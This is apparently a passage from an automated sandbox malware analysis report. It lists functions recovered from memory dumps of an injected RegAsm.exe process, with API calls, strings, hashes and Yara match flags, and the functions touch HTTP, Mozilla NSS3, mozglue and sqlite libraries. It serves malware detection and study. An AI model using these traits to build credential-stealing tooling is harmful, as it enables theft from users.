                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                        • String ID: .exe
                                                                                                        • API String ID: 2831197775-4119554291
                                                                                                        • Opcode ID: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
                                                                                                        • Instruction ID: b22801d522c47b455a3bf9a13fec4127fa4a3e5ad37381d5e28ead6c554ce160
                                                                                                        • Opcode Fuzzy Hash: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
                                                                                                        • Instruction Fuzzy Hash: 87418472E00109BBDF11FBA6ED42ACE7375AF44308F110076F500B7191D6B86E8A8BD9
                                                                                                        Function 6C204D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C204D57
                                                                                                        • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C204DE6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorR_snprintf
                                                                                                        • String ID: %d.%d
                                                                                                        • API String ID: 2298970422-3954714993
                                                                                                        • Opcode ID: caabbd4334fa6c2ce0003f45c4f1ff38325e5b50dcba41e43c9f3fe854f5faef
                                                                                                        • Instruction ID: fd8251d871e647d320a67dc52afee14a4793752d858182c9590374e38f0cf117
                                                                                                        • Opcode Fuzzy Hash: caabbd4334fa6c2ce0003f45c4f1ff38325e5b50dcba41e43c9f3fe854f5faef
                                                                                                        • Instruction Fuzzy Hash: 8531EAB6E0021D6BFB109BA19C05BFF7768EF45308F05046AED159B781EB709915CBA1
                                                                                                        Function 0040F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Xinvalid_argument_memmovestd::_
                                                                                                        • String ID: string too long
                                                                                                        • API String ID: 256744135-2556327735
                                                                                                        • Opcode ID: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
                                                                                                        • Instruction ID: 7a0806fae085cf6787416122fb97cfb1012f07200118ac727d966ddb9d8bf46f
                                                                                                        • Opcode Fuzzy Hash: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
                                                                                                        • Instruction Fuzzy Hash: D211E371300201AFDB24DE2DD840929B369FF85354714013FF801ABBC2C779EC59C2AA
                                                                                                        Function 00411ECF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: malloc
                                                                                                        • String ID: image/jpeg
                                                                                                        • API String ID: 2803490479-3785015651
                                                                                                        • Opcode ID: 6b72b0d373d1163626baf5e7838df7277c332a4d567d67e2b356543416a513d9
                                                                                                        • Instruction ID: 1c9963d8e1bd3712552ddde0994ffc3eb950a7432bc1cc1e62e4a2615aecff81
                                                                                                        • Opcode Fuzzy Hash: 6b72b0d373d1163626baf5e7838df7277c332a4d567d67e2b356543416a513d9
                                                                                                        • Instruction Fuzzy Hash: 5A11A572910108FFCB10CFA5CD848DEBB7AFE05361B21026BEA11A21A0D7769E81DA54
                                                                                                        Function 0040F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F13E
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                                                          • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                                                          • Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242
                                                                                                        • _memmove.LIBCMT ref: 0040F190
                                                                                                        Strings
                                                                                                        • invalid string position, xrefs: 0040F139
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                        • String ID: invalid string position
                                                                                                        • API String ID: 3404309857-1799206989
                                                                                                        • Opcode ID: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
                                                                                                        • Instruction ID: e23b5eb9a1e42f9e221b8677ce3c7703de2c6ddbdd5f367577b3bfe0c378d6ff
                                                                                                        • Opcode Fuzzy Hash: 91242230ce68a24c4f38e49356161a9258fe8054196df98927784ca714c59dc8
                                                                                                        • Instruction Fuzzy Hash: 0111E131304210DBDB24DE6DD88095973A6AF55324754063BF815EFAC2C33CED49879A
                                                                                                        Function 6C2A0900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • sqlite3_value_text.NSS3(?), ref: 6C2A0917
                                                                                                        • sqlite3_value_text.NSS3(?), ref: 6C2A0923
                                                                                                          • Part of subcall function 6C1613C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C132352,?,00000000,?,?), ref: 6C161413
                                                                                                          • Part of subcall function 6C1613C0: memcpy.VCRUNTIME140(00000000,6C132352,00000002,?,?,?,?,6C132352,?,00000000,?,?), ref: 6C1614C0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_value_text$memcpystrlen
                                                                                                        • String ID: error in %s %s%s%s: %s
                                                                                                        • API String ID: 1937290486-1007276823
                                                                                                        • Opcode ID: 6253dd0e5e225e9fb531dee7bdbb17bbcbeada4c6209a41f77f2aedd6b74a28d
                                                                                                        • Instruction ID: 187be26f5c5e0cab71c942f79b3a9a0ede5fe33703a3d343482db3ed4a674691
                                                                                                        • Opcode Fuzzy Hash: 6253dd0e5e225e9fb531dee7bdbb17bbcbeada4c6209a41f77f2aedd6b74a28d
                                                                                                        • Instruction Fuzzy Hash: F90148BAE001099FDB009E58EC01ABBBBB5EFC1218F144029ED595B701F732992587E1
                                                                                                        Function 0040F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F35C
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                                                          • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                                                        • memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,75920440,?,-00000001), ref: 0040F392
                                                                                                        Strings
                                                                                                        • invalid string position, xrefs: 0040F357
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                        • String ID: invalid string position
                                                                                                        • API String ID: 1659287814-1799206989
                                                                                                        • Opcode ID: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
                                                                                                        • Instruction ID: a91313bf5449129972d3e0b6c61bf396901b99abf7d864de5386db584678c47f
                                                                                                        • Opcode Fuzzy Hash: 348d0c2b69c2b191df159d42681712194dc71b74dbe289b0b6df523c31963809
                                                                                                        • Instruction Fuzzy Hash: 6F01AD713007018BD7348E7989C491FB2E2EB85B21734493ED882D7B85DB7CE84E8398
                                                                                                        Function 004281CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45stringCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strcpy_s.MSVCRT ref: 004281DE
                                                                                                        • __invoke_watson.LIBCMT ref: 00428232
                                                                                                          • Part of subcall function 0042806D: _strcat_s.LIBCMT ref: 0042808C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __invoke_watson_strcat_sstrcpy_s
                                                                                                        • String ID: ,NC
                                                                                                        • API String ID: 1132195725-1329140791
                                                                                                        • Opcode ID: 731b6ac6b642e3e8e5147aea8b100b6241764734f43c48f2503a638a59afb5d8
                                                                                                        • Instruction ID: 7263c20261f1d33d4cce58c4812a6ccf3018c0f2168d81fa3d23ea862a0e3966
                                                                                                        • Opcode Fuzzy Hash: 731b6ac6b642e3e8e5147aea8b100b6241764734f43c48f2503a638a59afb5d8
                                                                                                        • Instruction Fuzzy Hash: A0F0C872641228BFDB116A91EC02EDB3F59EF04350F854066F91955111DA36AD54C764
                                                                                                        Function 6C224CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3('8"l,00000000,00000000,?,?,6C223827,?,00000000), ref: 6C224D0A
                                                                                                          • Part of subcall function 6C210840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C2108B4
                                                                                                        • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C224D22
                                                                                                          • Part of subcall function 6C20FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C1B1A3E,00000048,00000054), ref: 6C20FD56
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                        • String ID: '8"l
                                                                                                        • API String ID: 1521942269-3580860384
                                                                                                        • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                        • Instruction ID: a671a1702d616b2ea051faa17677554ed5d91da32192db1416a96c0def286448
                                                                                                        • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                        • Instruction Fuzzy Hash: B2F0903A60122A67EB104D6AAC80B4336DC9B416BEF550271FD28CB781E675CC01C6E1
                                                                                                        Function 6C24AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_GetUniqueIdentity.NSS3(SSL), ref: 6C24AF78
                                                                                                          • Part of subcall function 6C1AACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C1AACE2
                                                                                                          • Part of subcall function 6C1AACC0: malloc.MOZGLUE(00000001), ref: 6C1AACEC
                                                                                                          • Part of subcall function 6C1AACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C1AAD02
                                                                                                          • Part of subcall function 6C1AACC0: TlsGetValue.KERNEL32 ref: 6C1AAD3C
                                                                                                          • Part of subcall function 6C1AACC0: calloc.MOZGLUE(00000001,?), ref: 6C1AAD8C
                                                                                                          • Part of subcall function 6C1AACC0: PR_Unlock.NSS3 ref: 6C1AADC0
                                                                                                          • Part of subcall function 6C1AACC0: PR_Unlock.NSS3 ref: 6C1AAE8C
                                                                                                          • Part of subcall function 6C1AACC0: free.MOZGLUE(?), ref: 6C1AAEAB
                                                                                                        • memcpy.VCRUNTIME140(6C313084,6C3102AC,00000090), ref: 6C24AF94
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
                                                                                                        • String ID: SSL
                                                                                                        • API String ID: 2424436289-2135378647
                                                                                                        • Opcode ID: c999c876bed03514ef2ba07fccd7ab4fbe793d3808f796891528fbb5dba5b3c8
                                                                                                        • Instruction ID: 46c225d87727efbf413daea96ffbbab77456c2b98f976d1c7e2f06207d3f252c
                                                                                                        • Opcode Fuzzy Hash: c999c876bed03514ef2ba07fccd7ab4fbe793d3808f796891528fbb5dba5b3c8
                                                                                                        • Instruction Fuzzy Hash: EA214DB6B05E4C9FCA88DF65E913796BAF8B302A48F119158C90A1BF28D77141089F91
                                                                                                        Function 0041F3BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: NameName::
                                                                                                        • String ID: {flat}
                                                                                                        • API String ID: 1333004437-2606204563
                                                                                                        • Opcode ID: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
                                                                                                        • Instruction ID: da75913b68d6d07b0bcc9ceeb751d75e82138ebb165cf24839429cfec7228cb0
                                                                                                        • Opcode Fuzzy Hash: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
                                                                                                        • Instruction Fuzzy Hash: 75F08535244208AFCB11EF59D445AE43BA0AF8575AF08808AF9484F293C774E882CB99
                                                                                                        Function 6C0A6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • moz_xmalloc.MOZGLUE(0Kl,?,6C0D4B30,80000000,?,6C0D4AB7,?,6C0943CF,?,6C0942D2), ref: 6C0A6C42
                                                                                                          • Part of subcall function 6C0ACA10: malloc.MOZGLUE(?), ref: 6C0ACA26
                                                                                                        • moz_xmalloc.MOZGLUE(0Kl,?,6C0D4B30,80000000,?,6C0D4AB7,?,6C0943CF,?,6C0942D2), ref: 6C0A6C58
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: moz_xmalloc$malloc
                                                                                                        • String ID: 0Kl
                                                                                                        • API String ID: 1967447596-1544165026
                                                                                                        • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                        • Instruction ID: 3f759e8cc7e53e9135e0cdb0c7aea9eccb75d0c62fab87316c95661aa1c7c2b1
                                                                                                        • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                        • Instruction Fuzzy Hash: 1DE026F1B501002ADB0899FCDC1D73E71D8CB246A8F084A35E822C3BCAFE15E4828051
                                                                                                        Function 0040141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
